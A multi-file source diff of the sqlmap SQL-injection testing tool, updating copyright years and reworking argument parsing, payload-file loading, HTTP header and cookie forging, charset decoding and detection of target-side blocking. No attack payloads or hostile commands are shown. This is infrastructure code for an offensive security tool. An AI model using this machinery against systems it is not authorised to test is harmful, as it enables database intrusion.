||||||
|
@ -793,16 +890,25 @@ def cmdLineParser():
|
||||||
parser.option_groups.remove(group)
|
parser.option_groups.remove(group)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
(args, _) = parser.parse_args(args)
|
(args, _) = parser.parse_args(argv)
|
||||||
|
except UnicodeEncodeError, ex:
|
||||||
|
print "\n[!] %s" % ex.object.encode("unicode-escape")
|
||||||
|
raise SystemExit
|
||||||
except SystemExit:
|
except SystemExit:
|
||||||
if '-h' in sys.argv and not advancedHelp:
|
if "-h" in argv and not advancedHelp:
|
||||||
print "\n[!] to see full list of options run with '-hh'"
|
print "\n[!] to see full list of options run with '-hh'"
|
||||||
raise
|
raise
|
||||||
|
|
||||||
|
if extraHeaders:
|
||||||
|
if not args.headers:
|
||||||
|
args.headers = ""
|
||||||
|
delimiter = "\\n" if "\\n" in args.headers else "\n"
|
||||||
|
args.headers += delimiter + delimiter.join(extraHeaders)
|
||||||
|
|
||||||
# Expand given mnemonic options (e.g. -z "ign,flu,bat")
|
# Expand given mnemonic options (e.g. -z "ign,flu,bat")
|
||||||
for i in xrange(len(sys.argv) - 1):
|
for i in xrange(len(argv) - 1):
|
||||||
if sys.argv[i] == '-z':
|
if argv[i] == "-z":
|
||||||
expandMnemonics(sys.argv[i + 1], parser, args)
|
expandMnemonics(argv[i + 1], parser, args)
|
||||||
|
|
||||||
if args.dummy:
|
if args.dummy:
|
||||||
args.url = args.url or DUMMY_URL
|
args.url = args.url or DUMMY_URL
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -11,6 +11,8 @@ from ConfigParser import MissingSectionHeaderError
|
||||||
from ConfigParser import ParsingError
|
from ConfigParser import ParsingError
|
||||||
|
|
||||||
from lib.core.common import checkFile
|
from lib.core.common import checkFile
|
||||||
|
from lib.core.common import getUnicode
|
||||||
|
from lib.core.common import openFile
|
||||||
from lib.core.common import unArrayizeValue
|
from lib.core.common import unArrayizeValue
|
||||||
from lib.core.common import UnicodeRawConfigParser
|
from lib.core.common import UnicodeRawConfigParser
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
|
@ -40,7 +42,7 @@ def configFileProxy(section, option, boolean=False, integer=False):
|
||||||
value = config.get(section, option)
|
value = config.get(section, option)
|
||||||
except ValueError, ex:
|
except ValueError, ex:
|
||||||
errMsg = "error occurred while processing the option "
|
errMsg = "error occurred while processing the option "
|
||||||
errMsg += "'%s' in provided configuration file ('%s')" % (option, str(ex))
|
errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex))
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if value:
|
if value:
|
||||||
|
@ -65,13 +67,13 @@ def configFileParser(configFile):
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
checkFile(configFile)
|
checkFile(configFile)
|
||||||
configFP = codecs.open(configFile, "rb", UNICODE_ENCODING)
|
configFP = openFile(configFile, "rb")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
config = UnicodeRawConfigParser()
|
config = UnicodeRawConfigParser()
|
||||||
config.readfp(configFP)
|
config.readfp(configFP)
|
||||||
except (MissingSectionHeaderError, ParsingError), ex:
|
except Exception, ex:
|
||||||
errMsg = "you have provided an invalid configuration file ('%s')" % str(ex)
|
errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % ex.message
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if not config.has_section("Target"):
|
if not config.has_section("Target"):
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,14 +1,13 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import itertools
|
import itertools
|
||||||
import os
|
import os
|
||||||
|
|
||||||
from lib.core.common import checkFile
|
|
||||||
from lib.core.common import parseXmlFile
|
from lib.core.common import parseXmlFile
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
|
@ -36,7 +35,6 @@ def headersParser(headers):
|
||||||
for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
|
for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
|
||||||
value = headers[header]
|
value = headers[header]
|
||||||
xmlfile = kb.headerPaths[header]
|
xmlfile = kb.headerPaths[header]
|
||||||
checkFile(xmlfile)
|
|
||||||
|
|
||||||
handler = FingerprintHandler(value, kb.headersFp)
|
handler = FingerprintHandler(value, kb.headersFp)
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -9,7 +9,6 @@ import re
|
||||||
|
|
||||||
from xml.sax.handler import ContentHandler
|
from xml.sax.handler import ContentHandler
|
||||||
|
|
||||||
from lib.core.common import checkFile
|
|
||||||
from lib.core.common import parseXmlFile
|
from lib.core.common import parseXmlFile
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
|
@ -49,7 +48,6 @@ def htmlParser(page):
|
||||||
"""
|
"""
|
||||||
|
|
||||||
xmlfile = paths.ERRORS_XML
|
xmlfile = paths.ERRORS_XML
|
||||||
checkFile(xmlfile)
|
|
||||||
handler = HTMLHandler(page)
|
handler = HTMLHandler(page)
|
||||||
|
|
||||||
parseXmlFile(xmlfile, handler)
|
parseXmlFile(xmlfile, handler)
|
||||||
|
|
|
@ -1,15 +1,18 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
|
||||||
from xml.etree import ElementTree as et
|
from xml.etree import ElementTree as et
|
||||||
|
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
from lib.core.datatype import AttribDict
|
from lib.core.datatype import AttribDict
|
||||||
|
from lib.core.exception import SqlmapInstallationException
|
||||||
|
|
||||||
def cleanupVals(text, tag):
|
def cleanupVals(text, tag):
|
||||||
if tag in ("clause", "where"):
|
if tag in ("clause", "where"):
|
||||||
|
@ -66,7 +69,32 @@ def parseXmlNode(node):
|
||||||
|
|
||||||
conf.tests.append(test)
|
conf.tests.append(test)
|
||||||
|
|
||||||
def loadPayloads():
|
def loadBoundaries():
|
||||||
doc = et.parse(paths.PAYLOADS_XML)
|
try:
|
||||||
|
doc = et.parse(paths.BOUNDARIES_XML)
|
||||||
|
except Exception, ex:
|
||||||
|
errMsg = "something seems to be wrong with "
|
||||||
|
errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, ex)
|
||||||
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
|
raise SqlmapInstallationException, errMsg
|
||||||
|
|
||||||
|
root = doc.getroot()
|
||||||
|
parseXmlNode(root)
|
||||||
|
|
||||||
|
def loadPayloads():
|
||||||
|
payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH)
|
||||||
|
payloadFiles.sort()
|
||||||
|
|
||||||
|
for payloadFile in payloadFiles:
|
||||||
|
payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
|
||||||
|
|
||||||
|
try:
|
||||||
|
doc = et.parse(payloadFilePath)
|
||||||
|
except Exception, ex:
|
||||||
|
errMsg = "something seems to be wrong with "
|
||||||
|
errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, ex)
|
||||||
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
|
raise SqlmapInstallationException, errMsg
|
||||||
|
|
||||||
root = doc.getroot()
|
root = doc.getroot()
|
||||||
parseXmlNode(root)
|
parseXmlNode(root)
|
||||||
|
|
|
@ -1,15 +1,17 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import httplib
|
||||||
import re
|
import re
|
||||||
|
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
from lib.request.connect import Connect as Request
|
from lib.request.connect import Connect as Request
|
||||||
from thirdparty.oset.pyoset import oset
|
from thirdparty.oset.pyoset import oset
|
||||||
|
|
||||||
|
@ -26,8 +28,13 @@ def parseSitemap(url, retVal=None):
|
||||||
abortedFlag = False
|
abortedFlag = False
|
||||||
retVal = oset()
|
retVal = oset()
|
||||||
|
|
||||||
|
try:
|
||||||
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
||||||
for match in re.finditer(r"<loc>\s*([^<]+)", content):
|
except httplib.InvalidURL:
|
||||||
|
errMsg = "invalid URL given for sitemap ('%s')" % url
|
||||||
|
raise SqlmapSyntaxException, errMsg
|
||||||
|
|
||||||
|
for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
|
||||||
if abortedFlag:
|
if abortedFlag:
|
||||||
break
|
break
|
||||||
url = match.group(1).strip()
|
url = match.group(1).strip()
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -27,10 +27,10 @@ from lib.core.data import logger
|
||||||
from lib.core.enums import HTTP_HEADER
|
from lib.core.enums import HTTP_HEADER
|
||||||
from lib.core.enums import PLACE
|
from lib.core.enums import PLACE
|
||||||
from lib.core.exception import SqlmapCompressionException
|
from lib.core.exception import SqlmapCompressionException
|
||||||
|
from lib.core.settings import BLOCKED_IP_REGEX
|
||||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||||
from lib.core.settings import EVENTVALIDATION_REGEX
|
from lib.core.settings import EVENTVALIDATION_REGEX
|
||||||
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
|
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
|
||||||
from lib.core.settings import ML
|
|
||||||
from lib.core.settings import META_CHARSET_REGEX
|
from lib.core.settings import META_CHARSET_REGEX
|
||||||
from lib.core.settings import PARSE_HEADERS_LIMIT
|
from lib.core.settings import PARSE_HEADERS_LIMIT
|
||||||
from lib.core.settings import VIEWSTATE_REGEX
|
from lib.core.settings import VIEWSTATE_REGEX
|
||||||
|
@ -38,6 +38,7 @@ from lib.parse.headers import headersParser
|
||||||
from lib.parse.html import htmlParser
|
from lib.parse.html import htmlParser
|
||||||
from lib.utils.htmlentities import htmlEntities
|
from lib.utils.htmlentities import htmlEntities
|
||||||
from thirdparty.chardet import detect
|
from thirdparty.chardet import detect
|
||||||
|
from thirdparty.odict.odict import OrderedDict
|
||||||
|
|
||||||
def forgeHeaders(items=None):
|
def forgeHeaders(items=None):
|
||||||
"""
|
"""
|
||||||
|
@ -51,8 +52,8 @@ def forgeHeaders(items=None):
|
||||||
if items[_] is None:
|
if items[_] is None:
|
||||||
del items[_]
|
del items[_]
|
||||||
|
|
||||||
headers = dict(conf.httpHeaders)
|
headers = OrderedDict(conf.httpHeaders)
|
||||||
headers.update(items or {})
|
headers.update(items.items())
|
||||||
|
|
||||||
class _str(str):
|
class _str(str):
|
||||||
def capitalize(self):
|
def capitalize(self):
|
||||||
|
@ -62,9 +63,15 @@ def forgeHeaders(items=None):
|
||||||
return _str(self)
|
return _str(self)
|
||||||
|
|
||||||
_ = headers
|
_ = headers
|
||||||
headers = {}
|
headers = OrderedDict()
|
||||||
for key, value in _.items():
|
for key, value in _.items():
|
||||||
success = False
|
success = False
|
||||||
|
|
||||||
|
for _ in headers:
|
||||||
|
if _.upper() == key.upper():
|
||||||
|
del headers[_]
|
||||||
|
break
|
||||||
|
|
||||||
if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)):
|
if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)):
|
||||||
try:
|
try:
|
||||||
headers[_str(key)] = value # dirty hack for http://bugs.python.org/issue12455
|
headers[_str(key)] = value # dirty hack for http://bugs.python.org/issue12455
|
||||||
|
@ -93,8 +100,8 @@ def forgeHeaders(items=None):
|
||||||
_ = readInput(message, default="Y")
|
_ = readInput(message, default="Y")
|
||||||
kb.mergeCookies = not _ or _[0] in ("y", "Y")
|
kb.mergeCookies = not _ or _[0] in ("y", "Y")
|
||||||
|
|
||||||
if kb.mergeCookies:
|
if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
|
||||||
_ = lambda x: re.sub("(?i)%s=[^%s]+" % (cookie.name, conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
|
_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
|
||||||
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
|
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
|
||||||
|
|
||||||
if PLACE.COOKIE in conf.parameters:
|
if PLACE.COOKIE in conf.parameters:
|
||||||
|
@ -105,7 +112,7 @@ def forgeHeaders(items=None):
|
||||||
elif not kb.testMode:
|
elif not kb.testMode:
|
||||||
headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value))
|
headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value))
|
||||||
|
|
||||||
if kb.testMode:
|
if kb.testMode and not conf.csrfToken:
|
||||||
resetCookieJar(conf.cj)
|
resetCookieJar(conf.cj)
|
||||||
|
|
||||||
return headers
|
return headers
|
||||||
|
@ -141,7 +148,7 @@ def checkCharEncoding(encoding, warn=True):
|
||||||
return encoding
|
return encoding
|
||||||
|
|
||||||
# Reference: http://www.destructor.de/charsets/index.htm
|
# Reference: http://www.destructor.de/charsets/index.htm
|
||||||
translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk"}
|
translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"}
|
||||||
|
|
||||||
for delimiter in (';', ',', '('):
|
for delimiter in (';', ',', '('):
|
||||||
if delimiter in encoding:
|
if delimiter in encoding:
|
||||||
|
@ -194,7 +201,7 @@ def checkCharEncoding(encoding, warn=True):
|
||||||
except LookupError:
|
except LookupError:
|
||||||
if warn:
|
if warn:
|
||||||
warnMsg = "unknown web page charset '%s'. " % encoding
|
warnMsg = "unknown web page charset '%s'. " % encoding
|
||||||
warnMsg += "Please report by e-mail to %s." % ML
|
warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
|
||||||
singleTimeLogMessage(warnMsg, logging.WARN, encoding)
|
singleTimeLogMessage(warnMsg, logging.WARN, encoding)
|
||||||
encoding = None
|
encoding = None
|
||||||
|
|
||||||
|
@ -257,7 +264,7 @@ def decodePage(page, contentEncoding, contentType):
|
||||||
|
|
||||||
if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
|
if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
|
||||||
or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
|
or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
|
||||||
kb.pageEncoding = httpCharset or metaCharset
|
kb.pageEncoding = httpCharset or metaCharset # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence
|
||||||
debugMsg = "declared web page charset '%s'" % kb.pageEncoding
|
debugMsg = "declared web page charset '%s'" % kb.pageEncoding
|
||||||
singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
|
singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
|
||||||
else:
|
else:
|
||||||
|
@ -267,6 +274,10 @@ def decodePage(page, contentEncoding, contentType):
|
||||||
|
|
||||||
# can't do for all responses because we need to support binary files too
|
# can't do for all responses because we need to support binary files too
|
||||||
if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
|
if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
|
||||||
|
if kb.heuristicMode:
|
||||||
|
kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
|
||||||
|
page = getUnicode(page, kb.pageEncoding)
|
||||||
|
else:
|
||||||
# e.g. Ãëàâà
|
# e.g. Ãëàâà
|
||||||
if "&#" in page:
|
if "&#" in page:
|
||||||
page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
|
page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
|
||||||
|
@ -300,6 +311,8 @@ def decodePage(page, contentEncoding, contentType):
|
||||||
def processResponse(page, responseHeaders):
|
def processResponse(page, responseHeaders):
|
||||||
kb.processResponseCounter += 1
|
kb.processResponseCounter += 1
|
||||||
|
|
||||||
|
page = page or ""
|
||||||
|
|
||||||
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)
|
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)
|
||||||
|
|
||||||
if conf.parseErrors:
|
if conf.parseErrors:
|
||||||
|
@ -318,3 +331,7 @@ def processResponse(page, responseHeaders):
|
||||||
continue
|
continue
|
||||||
conf.paramDict[PLACE.POST][name] = value
|
conf.paramDict[PLACE.POST][name] = value
|
||||||
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])
|
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])
|
||||||
|
|
||||||
|
if re.search(BLOCKED_IP_REGEX, page):
|
||||||
|
errMsg = "it appears that you have been blocked by the target server"
|
||||||
|
singleTimeLogMessage(errMsg, logging.ERROR)
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -132,8 +132,21 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
||||||
seq1 = seq1[count:]
|
seq1 = seq1[count:]
|
||||||
seq2 = seq2[count:]
|
seq2 = seq2[count:]
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
seqMatcher.set_seq1(seq1)
|
seqMatcher.set_seq1(seq1)
|
||||||
|
except MemoryError:
|
||||||
|
seq1 = seq1[:len(seq1) / 1024]
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
seqMatcher.set_seq2(seq2)
|
seqMatcher.set_seq2(seq2)
|
||||||
|
except MemoryError:
|
||||||
|
seq2 = seq2[:len(seq2) / 1024]
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
|
||||||
ratio = round(seqMatcher.quick_ratio(), 3)
|
ratio = round(seqMatcher.quick_ratio(), 3)
|
||||||
|
|
||||||
|
|
|
@ -1,21 +1,31 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import compiler
|
||||||
import httplib
|
import httplib
|
||||||
import json
|
import json
|
||||||
|
import keyword
|
||||||
import logging
|
import logging
|
||||||
import re
|
import re
|
||||||
import socket
|
import socket
|
||||||
import string
|
import string
|
||||||
|
import struct
|
||||||
import time
|
import time
|
||||||
import traceback
|
import traceback
|
||||||
import urllib2
|
import urllib2
|
||||||
import urlparse
|
import urlparse
|
||||||
|
|
||||||
|
try:
|
||||||
|
import websocket
|
||||||
|
from websocket import WebSocketException
|
||||||
|
except ImportError:
|
||||||
|
class WebSocketException(Exception):
|
||||||
|
pass
|
||||||
|
|
||||||
from extra.safe2bin.safe2bin import safecharencode
|
from extra.safe2bin.safe2bin import safecharencode
|
||||||
from lib.core.agent import agent
|
from lib.core.agent import agent
|
||||||
from lib.core.common import asciifyUrl
|
from lib.core.common import asciifyUrl
|
||||||
|
@ -27,6 +37,7 @@ from lib.core.common import evaluateCode
|
||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
from lib.core.common import findMultipartPostBoundary
|
from lib.core.common import findMultipartPostBoundary
|
||||||
from lib.core.common import getCurrentThreadData
|
from lib.core.common import getCurrentThreadData
|
||||||
|
from lib.core.common import getHeader
|
||||||
from lib.core.common import getHostHeader
|
from lib.core.common import getHostHeader
|
||||||
from lib.core.common import getRequestHeader
|
from lib.core.common import getRequestHeader
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
|
@ -62,13 +73,16 @@ from lib.core.enums import REDIRECTION
|
||||||
from lib.core.enums import WEB_API
|
from lib.core.enums import WEB_API
|
||||||
from lib.core.exception import SqlmapCompressionException
|
from lib.core.exception import SqlmapCompressionException
|
||||||
from lib.core.exception import SqlmapConnectionException
|
from lib.core.exception import SqlmapConnectionException
|
||||||
|
from lib.core.exception import SqlmapGenericException
|
||||||
from lib.core.exception import SqlmapSyntaxException
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
|
from lib.core.exception import SqlmapTokenException
|
||||||
from lib.core.exception import SqlmapValueException
|
from lib.core.exception import SqlmapValueException
|
||||||
from lib.core.settings import ASTERISK_MARKER
|
from lib.core.settings import ASTERISK_MARKER
|
||||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||||
from lib.core.settings import DEFAULT_CONTENT_TYPE
|
from lib.core.settings import DEFAULT_CONTENT_TYPE
|
||||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
|
from lib.core.settings import EVALCODE_KEYWORD_SUFFIX
|
||||||
from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
|
from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
|
||||||
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
|
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
|
||||||
from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
|
from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
|
||||||
|
@ -92,8 +106,9 @@ from lib.request.basic import processResponse
|
||||||
from lib.request.direct import direct
|
from lib.request.direct import direct
|
||||||
from lib.request.comparison import comparison
|
from lib.request.comparison import comparison
|
||||||
from lib.request.methodrequest import MethodRequest
|
from lib.request.methodrequest import MethodRequest
|
||||||
from thirdparty.socks.socks import ProxyError
|
|
||||||
from thirdparty.multipart import multipartpost
|
from thirdparty.multipart import multipartpost
|
||||||
|
from thirdparty.odict.odict import OrderedDict
|
||||||
|
from thirdparty.socks.socks import ProxyError
|
||||||
|
|
||||||
|
|
||||||
class Connect(object):
|
class Connect(object):
|
||||||
|
@ -159,7 +174,7 @@ class Connect(object):
|
||||||
|
|
||||||
if not kb.dnsMode and conn:
|
if not kb.dnsMode and conn:
|
||||||
headers = conn.info()
|
headers = conn.info()
|
||||||
if headers and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
|
if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
|
||||||
or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
|
or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
|
||||||
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
||||||
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
|
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
|
||||||
|
@ -197,8 +212,10 @@ class Connect(object):
|
||||||
elif conf.cpuThrottle:
|
elif conf.cpuThrottle:
|
||||||
cpuThrottle(conf.cpuThrottle)
|
cpuThrottle(conf.cpuThrottle)
|
||||||
|
|
||||||
if conf.dummy:
|
if conf.offline:
|
||||||
return randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())
|
return None, None, None
|
||||||
|
elif conf.dummy:
|
||||||
|
return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None
|
||||||
|
|
||||||
threadData = getCurrentThreadData()
|
threadData = getCurrentThreadData()
|
||||||
with kb.locks.request:
|
with kb.locks.request:
|
||||||
|
@ -226,6 +243,8 @@ class Connect(object):
|
||||||
crawling = kwargs.get("crawling", False)
|
crawling = kwargs.get("crawling", False)
|
||||||
skipRead = kwargs.get("skipRead", False)
|
skipRead = kwargs.get("skipRead", False)
|
||||||
|
|
||||||
|
websocket_ = url.lower().startswith("ws")
|
||||||
|
|
||||||
if not urlparse.urlsplit(url).netloc:
|
